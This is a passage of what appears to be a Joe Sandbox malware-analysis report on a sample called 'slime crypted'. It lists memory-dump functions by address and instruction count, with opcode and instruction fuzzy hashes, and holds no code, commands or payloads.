Opcode Fuzzy Hash: 532c854ccea8c890480f549d0f5016654036032d46f9c794bf67950ec4c9c0f9
Instruction Fuzzy Hash: 960126B27682259BCB11464DB888C6ABB9EEF88325706C527E80DC7281CF20EC138380

Function 07178B28 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54f2051d62c3742da89a8064013cc82ea94089a3011792787f987f3f5b28f4b
Instruction ID: ff748d0e8fb3dc53331829c31cfeddc944da7594748526199de7bb3852e4fbb5
Opcode Fuzzy Hash: b54f2051d62c3742da89a8064013cc82ea94089a3011792787f987f3f5b28f4b
Instruction Fuzzy Hash: 75118F357001199FCB04EF69E8949AEBBB6FFC8320B10C12AE905D7354DB31A905CBA2

Function 0717A2A8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1975800f20480244e1a68a345352c4903523308936d4137b217f55aa899c28c
Instruction ID: 2f9f6873bcb4b076ef975f21944775e2c8187b16416685908f3f491e25f16310
Opcode Fuzzy Hash: d1975800f20480244e1a68a345352c4903523308936d4137b217f55aa899c28c
Instruction Fuzzy Hash: B7115170B142059FC715EF68D984A6EBBF6FF88620F504529E6469B394DB30EC05C7A1

Function 07176F39 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2496b141eeb0a8df89416d288bfba02cfe66a2962a55e2f447c3a5ee66daaf68
Instruction ID: e9322effe5c72805b03847fddfd5d07938aad78415d9cb862aba24931649ab77
Opcode Fuzzy Hash: 2496b141eeb0a8df89416d288bfba02cfe66a2962a55e2f447c3a5ee66daaf68
Instruction Fuzzy Hash: 60117C757006158FCB04CF68C584AAEB7F6FF88614B1080A9E8099B351CB35DD03CB91

Function 0101D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047264984.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_101d000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: a89a0ab8b905ab752b6795ee5d58e2b63e5c5f58495a698443d7e6be96a6e34e
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: D211D075504280CFDB12CF58D5C8B15FFA2FB44314F24C6AAE8494B65AC33BD44ACB62

Function 0717CDB7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f5eca0ee22c959a7243be4a9941934c7489d3b3149ffeed61aa843503981ac6
Instruction ID: 97f41c643736e2d2d4bfe0892ffe6224bfa9b1183f80b95e2afa0869b8b64206
Opcode Fuzzy Hash: 3f5eca0ee22c959a7243be4a9941934c7489d3b3149ffeed61aa843503981ac6
Instruction Fuzzy Hash: EA01B1B2B002109FC315DA68CC80F2BB7EADB8CA60F144129E505D7390DE30EC02C7E0

Function 0716E8C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e6bb521ab55503056f139c42a42446d513b51441cfa359fac509fa1b3f517a
Instruction ID: 00d36c73b7ee683a01908ccdf80903d9d7e5f3211722ceea8f46614f7e75272e
Opcode Fuzzy Hash: f4e6bb521ab55503056f139c42a42446d513b51441cfa359fac509fa1b3f517a
Instruction Fuzzy Hash: 33F0C276B182169FCB498EB9B4485AA7BE8EF45131B1800EFE00DC7281FE21DA55C780

Function 071789B8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c06aeae147d7216e59473b0b706458b7837e0776a020a2d51043ecd907e8fb
Instruction ID: 20cd0fdb9fdc7ae5f7d27a328a4ac39bdf406e909712d8a7faa5434327cbf503
Opcode Fuzzy Hash: 56c06aeae147d7216e59473b0b706458b7837e0776a020a2d51043ecd907e8fb
Instruction Fuzzy Hash: F3F03C7330811AAF9F559E99E848CBFBBAEFBC8275314812AF549C3240DB31E8159761

Function 07179AFC Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55944727e62bd0795025acfee01f589c5caaf209505fc4ff6f67b423be92a477
Instruction ID: 799bf0cdccd741809412073ec62baa15fc88761e75f2e827416cdb7ce730f18f
Opcode Fuzzy Hash: 55944727e62bd0795025acfee01f589c5caaf209505fc4ff6f67b423be92a477
Instruction Fuzzy Hash: AD115AB5D10219ABDF05CFA4CA41AEDBBF2AF48300F14801AE800B7290C731AA04CB60

Function 0716E0B1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40faa304e6c52f426483b07b86da602f5e21a60fa6773e6296b5fa34e8bcc2e0
Instruction ID: 8f320a9463d6d1963934dcf2a498d3ee8b69d5d0deb6cdd18fc724352e3cc7be
Opcode Fuzzy Hash: 40faa304e6c52f426483b07b86da602f5e21a60fa6773e6296b5fa34e8bcc2e0
Instruction Fuzzy Hash: BBF0FCF5704615ABC3118A4DD884D9BBB59FFC4220B198256FC08C7384DB31DC1686A0

Function 07179B08 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad0623bef7be7bf558e0ee57d6a45ab442661efc1cb85be2b32fc2ca96b6202
Instruction ID: e4fabc13dc77b3f26348d14b5813c180c275a82c4e48e2d90260ca9f14d02a35
Opcode Fuzzy Hash: 6ad0623bef7be7bf558e0ee57d6a45ab442661efc1cb85be2b32fc2ca96b6202
Instruction Fuzzy Hash: C5015BB4D10219ABDB05DF95D951AEDBFF2AF48310F108029E801B7290CB316A04CBA0

Function 07176168 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3c2f2ff1ee71e68bb042b7ba7f64d5546fb9a043ecc65a4e0c2562fc3d698f
Instruction ID: 6c9058ed1a2407622c2965ae7754417ebe0e75e4d7e4c688afb18b8de1a6d736
Opcode Fuzzy Hash: 6e3c2f2ff1ee71e68bb042b7ba7f64d5546fb9a043ecc65a4e0c2562fc3d698f
Instruction Fuzzy Hash: 2E018170620B12DFCB2A9A39D908527B7F6BFC4205B14883DE40286696DB75F884CB90

Function 0717F628 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3dd2c5c76889dbf103ec82f794b6ae9d4322df0c6c3667274eec07243dad012
Instruction ID: 65f658ba2ca35c34e3ecac231bf8dd1400c5a518cd03c41459cbb2c4c9333a8b
Opcode Fuzzy Hash: e3dd2c5c76889dbf103ec82f794b6ae9d4322df0c6c3667274eec07243dad012
Instruction Fuzzy Hash: ECF062797506018FC744CB39D95856977EBAFC966131AC0B9E106C7B70EE79CC028B40

Function 0716FC10 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735005b326cd12c1168ed9d270ae3246020ecfcbfbb9a60228dc39edddd23af2
Instruction ID: 04e752a85bec466909c477fb264571498954895f0db9cadd3d070537a57be267
Opcode Fuzzy Hash: 735005b326cd12c1168ed9d270ae3246020ecfcbfbb9a60228dc39edddd23af2
Instruction Fuzzy Hash: 80F0B4B2614525DFC7118748E588E25F79DEF84721B06CA56D81A9B692CB20EC238785

Function 0717F638 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca625db80ba1c787697457b0412a632ad202316135e8ea09facbd4a86c953a4c
Instruction ID: af2c0c2e17ccfc44fe717050ca47cfc6fce25bed14946324587f2b68ff02e852
Opcode Fuzzy Hash: ca625db80ba1c787697457b0412a632ad202316135e8ea09facbd4a86c953a4c
Instruction Fuzzy Hash: 38F0F8393505118FCB48DA3ED85886A77EBAFCD66531580B9F606CB770EFB5DC028A90

Function 0716E948 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf45184f2c2a20fb3069f85edcc0ce8fb4ec048c1c2abea4fee401f7aac068bb
Instruction ID: 23b4437fa7b9dca3f8e9148ad2254a18b9c7bdbd54035e948a3f19fb99bc408d
Opcode Fuzzy Hash: bf45184f2c2a20fb3069f85edcc0ce8fb4ec048c1c2abea4fee401f7aac068bb
Instruction Fuzzy Hash: 2FF0EC61B1A3A00FCB0A2778446406E3FA6EED360079540E3D049CB7C2EE288C0A83A2

Function 07176159 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fefe55a40ca04e2c2bb0125725764d0325c2fd700d5f56922b3bdff8c2addd8
Instruction ID: 2c56e3d961f5a9773e473a9b2938b753f6d786f7273ebe5a093cd0e6a002aec9
Opcode Fuzzy Hash: 7fefe55a40ca04e2c2bb0125725764d0325c2fd700d5f56922b3bdff8c2addd8
Instruction Fuzzy Hash: 50F0E2B1210B029FC7258E65D905B73B3BAFFC1215F14883CE04246A56CBB4F889CB80

Function 071789A8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b17f46c93cf624546b17fec46e29c82502044ed464f1423a25a00075aa4a4f
Instruction ID: bcde5520fdc9a8570d237a6ccb88135510c288bac9f9cc745a71c0fdecac2425
Opcode Fuzzy Hash: 32b17f46c93cf624546b17fec46e29c82502044ed464f1423a25a00075aa4a4f
Instruction Fuzzy Hash: D7F0E5B370411A6BCB54C969AC49FBF77EEEBC8224B088026F108C3240EB35D8068364

Function 07177027 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359a59a4efe2f5ec11c2c2d5bdebf14912dbc43374640e78c3d7dc7bac98758a
Instruction ID: 9175fc1b229bf92bbd97e49b71024290c365d08573a71068da07e0f6459d81e1
Opcode Fuzzy Hash: 359a59a4efe2f5ec11c2c2d5bdebf14912dbc43374640e78c3d7dc7bac98758a
Instruction Fuzzy Hash: 7EF0E9323403009BC7219A69DD06F567BF6EB85B15F04C53AF614CB2E1DBB1D805D740

Function 0717DAE0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d914a960dbb511797e6f64a1de82f724a24629173a2950739ae6ba5d8fd86ba
Instruction ID: edb8d8ac35273183c5469cece4239ff0f0e73e2b9fdfdd31be90214a13de8e19
Opcode Fuzzy Hash: 6d914a960dbb511797e6f64a1de82f724a24629173a2950739ae6ba5d8fd86ba
Instruction Fuzzy Hash: 32E0DF607183A44F83195ABC5811476BEFB5ECA100704898BE9828778ACF54DA81C3F2

Function 0716FBE0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04692b82d80bb46adda4c071c6e04034bc54a771a4bfb548f8621bd9c34fccae
Instruction ID: cc715e77c26b4ede5ad849d1ab63670bc946cb374bc03c1d6397e5d3eb9bf65b
Opcode Fuzzy Hash: 04692b82d80bb46adda4c071c6e04034bc54a771a4bfb548f8621bd9c34fccae
Instruction Fuzzy Hash: FFD09E76729116171A15159F789987BBE9FEBC9569314413BF90DC3340DEA18C068291

Function 07176A20 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0703ea14c984ae4cb3140303661f846b6d4f03b26ec257e0ca6512cb709aa63d
Instruction ID: 6bfd0fb7eeb93923684a56c188f5be8000ec8cf9890e9a601e8b958b4ee47cc1
Opcode Fuzzy Hash: 0703ea14c984ae4cb3140303661f846b6d4f03b26ec257e0ca6512cb709aa63d
Instruction Fuzzy Hash: 72E0CD721047154BCA15D76AE981B6777EEDF44221F048868E44987265DF54E505C7D0

Function 0716F492 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f164f1fba2916a9de5053c6f50b5e40d723ba8b512a21e6ac08a842908d5306
Instruction ID: 93174fa033810918ae1e1acc120b9287c2abe17cb11fc67bd20c28c846f207af
Opcode Fuzzy Hash: 2f164f1fba2916a9de5053c6f50b5e40d723ba8b512a21e6ac08a842908d5306
Instruction Fuzzy Hash: 72D0A771750004CF8B14C79CF8088E937BDDFC52217400076F606CB664C730992ACB61

Function 07176A30 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d472277108a16db6ca45ee5703a083a1d778dfc7179c1cf8ededd8522316cd6f
Instruction ID: d3121268fc8a4a44cffc0cfe1c6c59dc72043285be8244815adb1014e57a6e02
Opcode Fuzzy Hash: d472277108a16db6ca45ee5703a083a1d778dfc7179c1cf8ededd8522316cd6f
Instruction Fuzzy Hash: 69D05E712406168B8A15D76AE880CA7B7DEDF842213008529A41A87664DF64E845C7D0

Function 0716E93A Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7847c6f675ce9177a2861ec65c90913f2c2d31aba495c5ae8eb205a1f8272f9
Instruction ID: de61bba57ea25dacf113bcf08b20431bd5f18a182878b75e4003b827401bbff1
Opcode Fuzzy Hash: c7847c6f675ce9177a2861ec65c90913f2c2d31aba495c5ae8eb205a1f8272f9
Instruction Fuzzy Hash: 3ED022B29091B55BC3020678D88088ABF9CCF4AA10B1400A2E00CC32C0F3188C518BC0

Function 0716EEE4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489dd46a921037f4e01cb1fc293876099c027199aad7eea392ee5f602cf1c4bd
Instruction ID: b024e826660d3e55678c6ba4e458ccd3678f3c542b1bc42b31b02d87d72f8737
Opcode Fuzzy Hash: 489dd46a921037f4e01cb1fc293876099c027199aad7eea392ee5f602cf1c4bd
Instruction Fuzzy Hash: E4D0C935B414048F8B48DBADE5444AC7BF5EFCA225B1000AAE20AC7274DB3098168F50

Function 0716FBA7 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ee9431714890a16bc592a6610f5e40f4fd42618dca3e0711b9f44ac0de5073
Instruction ID: 871f20cf3ce2dce514f669224d52cb88662acdf3d755506be4f2c73d867663e3
Opcode Fuzzy Hash: 58ee9431714890a16bc592a6610f5e40f4fd42618dca3e0711b9f44ac0de5073
Instruction Fuzzy Hash: 97D0C93150E3C48FDB038B30D5164D43FB29E0320539905DBD48A8FA63C72ADE96C752

Function 0716F14C Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6ba38514973e5b4fc3783895b4ae6fef00df0d725bf1e084432f938b271b22
Instruction ID: f8c0903574ef136a594128152e771a95cb5ae511ff55e2cf51bec738339a3911
Opcode Fuzzy Hash: 5d6ba38514973e5b4fc3783895b4ae6fef00df0d725bf1e084432f938b271b22
Instruction Fuzzy Hash: 7DD012357400008F8748DA6CE4144DC37F5DFC5225B1100AAF207C7675CB30DC66C780

Function 07174390 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f21e663d31c747419791f8103fb71ae06133b8ea47ab735371f6f82c7b530e
Instruction ID: 4a025f34afa1cdd3b178cc4a465b6e7176ffe1fd0e5408c00b673107a1ce5433
Opcode Fuzzy Hash: 12f21e663d31c747419791f8103fb71ae06133b8ea47ab735371f6f82c7b530e
Instruction Fuzzy Hash: BEC092FB4081426FDE0046A0CE87F857752E7A9761F49C815B38588186C2E58366D72A

Non-executed Functions

Function 07164658 Relevance: 2.6, Strings: 1, Instructions: 1300COMMON

Download Yara Rule

Strings

~, xrefs: 07165992

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 843447290813c5ef3d0506d7942e699a4a547d44a354d74cbcf3698958db4447
Instruction ID: df2dd3c0e0c6d1501f7e52d823f4274291061ece933c4466e06431a19300820d
Opcode Fuzzy Hash: 843447290813c5ef3d0506d7942e699a4a547d44a354d74cbcf3698958db4447
Instruction Fuzzy Hash: 43D21B74A00219CFCB25DF64C988AADBBB2FF49305F1085A9E949AB390DB35DD91CF50

Function 07161298 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

%, xrefs: 0716168C

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 83f3f0386188181993e812fdf770a7c8e6f1d7b15e154c622b0b6f43c28c8590
Instruction ID: 3f945fcfc29564a1d259da994c1f7e9d3cb285fbfd36b95668ce382fc0532b9e
Opcode Fuzzy Hash: 83f3f0386188181993e812fdf770a7c8e6f1d7b15e154c622b0b6f43c28c8590
Instruction Fuzzy Hash: A60279B0A00209DFDB19DFA9D958AAEBBF6FF88300F14852DE4069B395DB359805CB51

Function 07177C48 Relevance: .9, Instructions: 862COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493645b5727de9b33237b7d117dfa734078fef0ae557157ef79afe086b0baf0f
Instruction ID: a31e007ce1ae2ab28a57932618a6fef5bc525a1c63b9f6debdaab0f38198626b
Opcode Fuzzy Hash: 493645b5727de9b33237b7d117dfa734078fef0ae557157ef79afe086b0baf0f
Instruction Fuzzy Hash: E9725DB06003019FD749DF19D55875ABAE6EF84308F64C96CD0098F396DBBAE90BCB91

Function 07177C58 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763ac58f47080e3075785453a00845633c096299cc70b2f941830b4bca7596a2
Instruction ID: 36188c3a25b9681db14ea46f5e9d112aa1d73c100af7e4d24b0fc158e7503f90
Opcode Fuzzy Hash: 763ac58f47080e3075785453a00845633c096299cc70b2f941830b4bca7596a2
Instruction Fuzzy Hash: AC626DB06002019FE749DF19D55875A7AEAEF84308F64C95CD0099F396CBBBE90BCB91

Function 0716AE80 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6796ccb2e3c3f46ce045196b66e79a123d2c2202673515b8f5528e096ed9e7
Instruction ID: 3fd926c3f710b5f2d13cfe46c18364a6e19b1dd94695ea42b7e56fc7f87eedf7
Opcode Fuzzy Hash: 0e6796ccb2e3c3f46ce045196b66e79a123d2c2202673515b8f5528e096ed9e7
Instruction Fuzzy Hash: 45427CB0A04205DFCB29DF68C598A6EBBF6BF88300F158469E416DB3A5CB34EC45CB51

Function 07161E18 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64a71f02acf3bb8efb73fa9ed51eab9ea62368ecec41d3dbca297b24ce8fbe4
Instruction ID: 9eb135f520d52aff7a10f43b19da01ae20166afc5e47889b0b922f41b1ec915b
Opcode Fuzzy Hash: e64a71f02acf3bb8efb73fa9ed51eab9ea62368ecec41d3dbca297b24ce8fbe4
Instruction Fuzzy Hash: 64427DB0B00305CFCB29DF39C658AAABBF6BF84315F14456DE5028B694DB79E891CB11

Function 071774C8 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca46abd95c1535686e6956c286ef38af17e2568b73bb6a8596f467b6a9e493c
Instruction ID: c437bd8c6cc295ced452560e4d0d023558d4279e850e300541639f024c5bf5b7
Opcode Fuzzy Hash: 9ca46abd95c1535686e6956c286ef38af17e2568b73bb6a8596f467b6a9e493c
Instruction Fuzzy Hash: 0812D5B1A002069FDB16DF68D940BAEBBF6FF44310F158569E4059B2E5DB30ED45CB90

Function 0716BB90 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b6d3a04f1e07dda80854e9cf0951ed42d94bb74e1f13ec3403b226515c15db
Instruction ID: de559501d7d9a7bcadf3c5e0b917b8629675ad3d863c9a40e698ecb9f5d69e28
Opcode Fuzzy Hash: 99b6d3a04f1e07dda80854e9cf0951ed42d94bb74e1f13ec3403b226515c15db
Instruction Fuzzy Hash: AC225DB4A04219DFCB15DF64C588BADBBB2FF89304F1080A9E449AB291DB31ED95CF51

Function 07167FB8 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63715157c43376e640caadc3e0f7a61b486dcff871e6b764b01bc7117f3ba7e1
Instruction ID: 913ea9e64f5a5650e55c568e22803507cf2ff133deaaae863700c71d34984a39
Opcode Fuzzy Hash: 63715157c43376e640caadc3e0f7a61b486dcff871e6b764b01bc7117f3ba7e1
Instruction Fuzzy Hash: 49027CB1A00705CFDB25CF69C588AAABBF2FF48310F158969E8469B7A1D734E855CF40

Function 07165E00 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

